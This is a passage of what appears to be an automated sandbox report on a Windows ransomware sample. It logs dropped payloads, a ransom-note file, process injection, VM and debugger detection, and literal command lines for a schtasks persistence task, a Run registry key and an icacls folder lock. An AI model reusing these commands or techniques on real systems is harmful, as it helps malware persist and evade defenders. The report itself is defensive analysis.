                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCommand line argument: --Task6_2_00419F90
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCommand line argument: --AutoStart6_2_00419F90
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCommand line argument: --Service6_2_00419F90
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCommand line argument: X1P6_2_00419F90
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCommand line argument: --Admin6_2_00419F90
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCommand line argument: runas6_2_00419F90
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCommand line argument: x2Q6_2_00419F90
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCommand line argument: x*P6_2_00419F90
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCommand line argument: C:\Windows\6_2_00419F90
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCommand line argument: D:\Windows\6_2_00419F90
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCommand line argument: 7P6_2_00419F90
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCommand line argument: %username%6_2_00419F90
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCommand line argument: F:\6_2_00419F90
                  Source: Ln0LqSBLhS.exeString found in binary or memory: set-addPolicy
                  Source: Ln0LqSBLhS.exeString found in binary or memory: id-cmc-addExtensions
                  Source: Ln0LqSBLhS.exeString found in binary or memory: set-addPolicy
                  Source: Ln0LqSBLhS.exeString found in binary or memory: id-cmc-addExtensions
                  Source: Ln0LqSBLhS.exeString found in binary or memory: set-addPolicy
                  Source: Ln0LqSBLhS.exeString found in binary or memory: id-cmc-addExtensions
                  Source: Ln0LqSBLhS.exeString found in binary or memory: id-cmc-addExtensions
                  Source: Ln0LqSBLhS.exeString found in binary or memory: set-addPolicy
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: Ln0LqSBLhS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: Ln0LqSBLhS.exe, Ln0LqSBLhS.exe, 00000007.00000002.248521541.0000000003C10000.00000040.00000001.sdmp, Ln0LqSBLhS.exe, 00000009.00000002.251711400.0000000000400000.00000040.00000001.sdmp
                  Source: Binary string: C:\yeget44\judayo-cizuf\cadoroyayif.pdb source: build3.exe, 0000000B.00000000.276012594.0000000000421000.00000002.00020000.sdmp, mstsca.exe, 00000013.00000000.287490535.0000000000421000.00000002.00020000.sdmp, mstsca.exe, 00000017.00000000.294848822.0000000000421000.00000002.00020000.sdmp, mstsca.exe, 0000001B.00000002.354063122.0000000000421000.00000002.00020000.sdmp, mstsca.exe, 0000001F.00000000.467834349.0000000000421000.00000002.00020000.sdmp
                  Source: Binary string: 2C:\yeget44\judayo-cizuf\cadoroyayif.pdb source: build3.exe, 0000000B.00000000.276012594.0000000000421000.00000002.00020000.sdmp, mstsca.exe, 00000013.00000000.287490535.0000000000421000.00000002.00020000.sdmp, mstsca.exe, 00000017.00000000.294848822.0000000000421000.00000002.00020000.sdmp, mstsca.exe, 0000001B.00000002.354063122.0000000000421000.00000002.00020000.sdmp, mstsca.exe, 0000001F.00000000.467834349.0000000000421000.00000002.00020000.sdmp
                  Source: Binary string: C:\gam\wozopikite\dikuxiv_toduguy\yifa_h.pdb source: Ln0LqSBLhS.exe
                  Source: Binary string: .>:C:\gam\wozopikite\dikuxiv_toduguy\yifa_h.pdb0 source: Ln0LqSBLhS.exe
                  Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: Ln0LqSBLhS.exe, 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Ln0LqSBLhS.exe, 00000003.00000001.234275088.0000000000400000.00000040.00020000.sdmp, Ln0LqSBLhS.exe, 00000005.00000002.244718914.0000000003B20000.00000040.00000001.sdmp, Ln0LqSBLhS.exe, 00000006.00000001.243226905.0000000000400000.00000040.00020000.sdmp, Ln0LqSBLhS.exe, 00000007.00000002.248521541.0000000003C10000.00000040.00000001.sdmp, Ln0LqSBLhS.exe, 00000009.00000002.251711400.0000000000400000.00000040.00000001.sdmp

                  Data Obfuscation:

                  barindex
                  Detected unpacking (changes PE section rights)Show sources
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeUnpacked PE file: 3.2.Ln0LqSBLhS.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeUnpacked PE file: 6.2.Ln0LqSBLhS.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                  Source: C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exeUnpacked PE file: 9.2.Ln0LqSBLhS.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                  Source: C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exeUnpacked PE file: 12.2.build3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeUnpacked PE file: 23.2.mstsca.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeUnpacked PE file: 28.2.mstsca.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeUnpacked PE file: 32.2.mstsca.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 2_2_01FB70AF push ecx; retf 2_2_01FB70B2
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 2_2_03C68F05 push ecx; ret 2_2_03C68F18
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_00428565 push ecx; ret 3_2_00428578
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 5_2_020A30AF push ecx; retf 5_2_020A30B2
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 5_2_03B48F05 push ecx; ret 5_2_03B48F18
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0050D050 push eax; retn 004Dh6_2_0050D6B5
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0050D008 push eax; retn 004Dh6_2_0050D6B5
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0050D028 push eax; retn 004Dh6_2_0050D6B5
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0050D090 push eax; retn 004Dh6_2_0050D6B5
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0050D0A8 push eax; retn 004Dh6_2_0050D6B5
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0050D318 push eax; retn 004Dh6_2_0050D6B5
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0050C4E0 push eax; retn 004Dh6_2_0050D6B5
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0050D550 push eax; retn 004Dh6_2_0050D6B5
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_00428565 push ecx; ret 6_2_00428578
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0050D698 push eax; retn 004Dh6_2_0050D6B5
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0050C960 push eax; retn 004Dh6_2_0050D6B5
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0050C928 push eax; retn 004Dh6_2_0050D6B5
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,FindCloseChangeNotification,3_2_00412220
                  Source: build3.exe.6.drStatic PE information: real checksum: 0x555e2 should be: 0x79833
                  Source: build2.exe.6.drStatic PE information: real checksum: 0x97247 should be: 0xbd5db
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.98769447308
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.98769447308
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.98482818013
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.98482818013
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build2[1].exeJump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exeJump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exe
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\Local Settings\Application Data\Application Data\e346cd35-2444-406b-9a28-805b44471c0b\build2.exe.lqqw (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build2.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\_readme.txtJump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\_readme.txtJump to behavior

                  Boot Survival:

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                  Source: C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe'
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,6_2_00481920
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749' /deny *S-1-1-0:(OI)(CI)(DE,DC)
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion:

                  barindex
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.295684060.0000000002F30000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X64\WINDBG.EXE10747
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.295684060.0000000002F30000.00000004.00000001.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\WIRESHARK\WIRESHARK.EXE8116
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.295684060.0000000002F30000.00000004.00000001.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\SUPERANTISPYWARE\SUPERANTISPYWARE.EXE10112
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exe TID: 6840Thread sleep time: -183000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 6520Thread sleep count: 380 > 30
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 6520Thread sleep time: -85500s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,6_2_00481920
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeThread delayed: delay time: 183000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeWindow / User API: threadDelayed 380
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build2[1].exeJump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeDropped PE file which has not been started: C:\Users\user\Local Settings\Application Data\Application Data\e346cd35-2444-406b-9a28-805b44471c0b\build2.exe.lqqw (copy)Jump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build2.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 2_2_01FB571C rdtsc 2_2_01FB571C
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,3_2_0040E670
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,6_2_0040E670
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeThread delayed: delay time: 183000Jump to behavior
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.295734363.0000000002F30000.00000004.00000001.sdmpBinary or memory string: *|hyper-v manager*|hyper v4225
                  Source: Ln0LqSBLhS.exe, 00000003.00000002.241487538.00000000007DB000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.295734363.0000000002F30000.00000004.00000001.sdmpBinary or memory string: *|vmware player*|vmplayer4486
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.296051811.0000000002F30000.00000004.00000001.sdmpBinary or memory string: hyper-v~
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.295684060.0000000002F30000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware Workstation\vmnetcfg.exe11073
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.295684060.0000000002F30000.00000004.00000001.sdmpBinary or memory string: VMware.Workstation.vmplayer7859
                  Source: Ln0LqSBLhS.exe, 00000003.00000002.241423250.000000000079B000.00000004.00000020.sdmp, Ln0LqSBLhS.exe, 00000006.00000003.245022877.0000000000881000.00000004.00000001.sdmp, Ln0LqSBLhS.exe, 00000009.00000002.253222608.000000000088E000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.295734363.0000000002F30000.00000004.00000001.sdmpBinary or memory string: *|hyper-v manager*|hyperv3631
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.295734363.0000000002F30000.00000004.00000001.sdmpBinary or memory string: *|vmware vsphere client*|vp5534
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.295684060.0000000002F30000.00000004.00000001.sdmpBinary or memory string: VMware.Horizon.Client9116
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.295734363.0000000002F30000.00000004.00000001.sdmpBinary or memory string: *|vmware workstation 12 player*|vmplayer5018
                  Source: Ln0LqSBLhS.exe, 00000009.00000002.253179888.0000000000849000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW .
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.295734363.0000000002F30000.00000004.00000001.sdmpBinary or memory string: *|vmware vsphere client*|vcenter5892
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.295967958.0000000002F30000.00000004.00000001.sdmpBinary or memory string: *|turn windows features on or off*|hyper-v3313
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.295684060.0000000002F30000.00000004.00000001.sdmpBinary or memory string: VMware.View.Client10660
                  Source: Ln0LqSBLhS.exe, 00000003.00000002.241276333.0000000000748000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\:
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.295684060.0000000002F30000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\Infrastructure\Virtual Infrastructure Client\Launcher\VpxClient.exe7674
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.295734363.0000000002F30000.00000004.00000001.sdmpBinary or memory string: *|vmware horizon client*|view2527
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.295684060.0000000002F30000.00000004.00000001.sdmpBinary or memory string: VMware.Workstation.vmui7347
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00410160
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_0040F730
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,6_2_0040F730
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,6_2_00410160
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,6_2_00481920
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,FindCloseChangeNotification,3_2_00412220
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 2_2_01FB40A3 push dword ptr fs:[00000030h]2_2_01FB40A3
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 2_2_03C40042 push dword ptr fs:[00000030h]2_2_03C40042
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 5_2_020A00A3 push dword ptr fs:[00000030h]5_2_020A00A3
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 5_2_03B20042 push dword ptr fs:[00000030h]5_2_03B20042
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_00424168 _memset,IsDebuggerPresent,3_2_00424168
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_0042A57A
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_00447CAC __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,3_2_00447CAC
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 2_2_01FB571C rdtsc 2_2_01FB571C
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_004329EC
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_004329BB SetUnhandledExceptionFilter,3_2_004329BB

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  Injects a PE file into a foreign processesShow sources
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeMemory written: C:\Users\user\Desktop\Ln0LqSBLhS.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeMemory written: C:\Users\user\Desktop\Ln0LqSBLhS.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exeMemory written: C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
                  Contains functionality to inject code into remote processesShow sources
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 2_2_03C40110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,2_2_03C40110
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeProcess created: C:\Users\user\Desktop\Ln0LqSBLhS.exe 'C:\Users\user\Desktop\Ln0LqSBLhS.exe' Jump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeProcess created: C:\Users\user\Desktop\Ln0LqSBLhS.exe 'C:\Users\user\Desktop\Ln0LqSBLhS.exe' --Admin IsNotAutoStart IsNotTaskJump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeProcess created: C:\Users\user\Desktop\Ln0LqSBLhS.exe 'C:\Users\user\Desktop\Ln0LqSBLhS.exe' --Admin IsNotAutoStart IsNotTaskJump to behavior
